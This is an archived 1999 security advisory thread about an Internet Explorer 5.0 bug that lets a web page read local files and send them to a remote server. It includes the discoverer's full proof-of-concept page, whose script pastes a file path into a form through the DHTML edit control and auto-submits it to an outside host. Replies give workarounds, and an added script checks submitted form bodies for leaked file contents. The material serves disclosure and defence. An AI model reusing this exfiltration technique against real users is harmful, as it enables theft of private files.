msie.5.0.local.files.txt

Date: 17 Aug 1999 00:00:00 | Reported by: Packet Storm | Type: packetstorm | Source: packetstormsecurity.com

Internet Explorer 5.0 has a bug that allows local files to be read and sent to a remote server.

`Date: Tue, 30 Mar 1999 19:35:16 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: IE 5.0 allows reading and sending local files to a remote server  
  
There is a security bug in Internet Explorer 5.0, which allows reading and  
sending local files to a remote server.  
The problem is a bug in the DHTML edit control, which allows pasting a  
filename in a FILE object. When the form is submitted via JavaScript, the  
contents of the file are sent to a remote server.  
  
Demonstration is available at: http://www.nat.bg/~joro/fr.html  
  
Workaround: Disable JavaScript  
  
I would like to thank Juan Cuartango  
(http://pages.whowhere.com/computers/cuartangojc/index.html) for his IE exploits,  
which helped me a lot for discovering this vulnerability!  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
  
-------------------------------------------------------------------------  
  
[http://www.nat.bg/~joro/fr.html]  
  
<HTML><HEAD><TITLE>IE 5.0 file reading</TITLE>  
</HEAD>  
<BODY>  
There is a bug in Internet Explorer 5.0 which allows reading and sending local files.  
<BR>  
The file name must be known.  
<BR>  
Thanks to Juan Cuartango for his exploits, which helped me a lot for discovering this vulnerability!  
<BR>  
Written by <A HREF="http://www.nat.bg/~joro">Georgi Guninski</A>  
<BR>  
Workaround: Disable JavaScript  
<BR>  
<BR>  
<INPUT TYPE=TEXT ID=A1 VALUE="C:\TEST.TXT">  
  
<SCRIPT>  
  
function f1()  
{  
  
  
document.all.A1.select();  
document.execCommand("copy");  
  
dh.DOM.forms(0).elements(0).focus();  
dh.execCommand(5032);  
setTimeout("dh.DOM.forms(0).submit();",1000);  
  
  
  
}  
  
function f()  
{  
alert("Create a file C:\\test.txt and it will be read and shown in another window \n You may need to wait some time");  
dh.loadURL("http://www.nat.bg/~joro/form3.html");  
setTimeout("f1()",2000);  
}  
  
setTimeout("f();",1000);  
  
</SCRIPT>  
  
  
  
  
<OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A height=100 id=dh   
width=700>  
</OBJECT>  
  
  
</BODY>  
</HTML>  
  
-------------------------------------------------------------------------  
  
Date: Wed, 31 Mar 1999 09:14:47 +0100  
From: Andrew Tulloch <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 allows reading and sending local files to a remote server  
  
  
If you look under scripting options in security settings, there is the option  
"Allow paste via script"; simply turning this to disabled provides this  
result:  
  
<paste>  
See the contents of your file among the other stuff  
----------------------------------------------------------------------------  
----  
-----------------------------7cf26c3b6a8 Content-Disposition: form-data;  
name = "a"; filename="" Content-Type:  
application/octet-stream -----------------------------7cf26c3b6a8--  
</paste>  
  
which as far as I see has disabled the reading of local files and is a  
little less drastic than disabling all JavaScript.  
  
Regards,  
  
Andrew Tulloch  
  
-------------------------------------------------------------------------  
  
Date: Wed, 31 Mar 1999 14:05:21 -0800  
From: "Stephen Purpura (MSFDC-JV)" <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 allows reading and sending local files to a remote server  
  
There is another workaround. In IE5, if you use the "built in" feature to  
limit scripted paste operations then the problem doesn't seem to manifest.  
  
Try the following and go to the sample implementation:  
  
Tools menu --> Internet options --> security tab --> custom level --> allow  
paste operations via script = prompt or disable  
  
  
Stephen  
  
`
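
One way to check the result of the "Allow paste via script" workaround on a test server is to inspect the submitted multipart/form-data body and see whether the file part is empty, as in the output quoted in the thread. The following is an added example, not code from the thread or its authors; the function name `fileParts`, the sample bodies and the file contents are constructed, and the boundary string is modelled on the quoted output.

```javascript
// Added example: report which parts of a captured multipart/form-data body
// actually carried a file (non-empty filename or non-empty content).
function fileParts(rawBody) {
  // Normalising CRLF is fine here: we only need "empty or not", not exact bytes.
  const body = "\n" + rawBody.replace(/\r\n/g, "\n");
  const firstLine = body.slice(1).split("\n", 1)[0];
  if (!firstLine.startsWith("--")) {
    throw new Error("body does not start with a boundary line");
  }
  const delim = "\n" + firstLine.trimEnd();      // delimiter must begin a line
  const findings = [];
  for (const chunk of body.split(delim).slice(1)) {
    if (chunk.startsWith("--")) break;           // closing "--boundary--"
    const split = chunk.indexOf("\n\n");         // blank line ends the headers
    const head = split === -1 ? chunk : chunk.slice(0, split);
    const data = split === -1 ? "" : chunk.slice(split + 2);
    const disp = head.split("\n")
      .find((l) => /^content-disposition:/i.test(l)) || "";
    const filename = /;\s*filename\s*=\s*"([^"]*)"/i.exec(disp);
    if (!filename) continue;                     // ordinary text field
    const name = /;\s*name\s*=\s*"([^"]*)"/i.exec(disp);
    findings.push({
      field: name ? name[1] : "",
      filename: filename[1],
      bytes: data.length,
      carriedFile: filename[1] !== "" || data.length > 0,
    });
  }
  return findings;
}

// Constructed samples. MITIGATED has the shape of the output quoted in the
// thread (empty filename, empty part); LEAKED is what a populated part looks like.
const B = "-".repeat(27) + "7cf26c3b6a8";
const part = (fn, data) =>
  `--${B}\r\nContent-Disposition: form-data; name="a"; filename="${fn}"\r\n` +
  `Content-Type: application/octet-stream\r\n\r\n${data}\r\n--${B}--\r\n`;
const MITIGATED = part("", "");
const LEAKED = part("C:\\TEST.TXT", "constructed file contents");

console.log(fileParts(MITIGATED), fileParts(LEAKED));
```

A part with `carriedFile: false` matches the mitigated result shown in the thread; any part with a filename or content means the browser still populated the FILE field.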
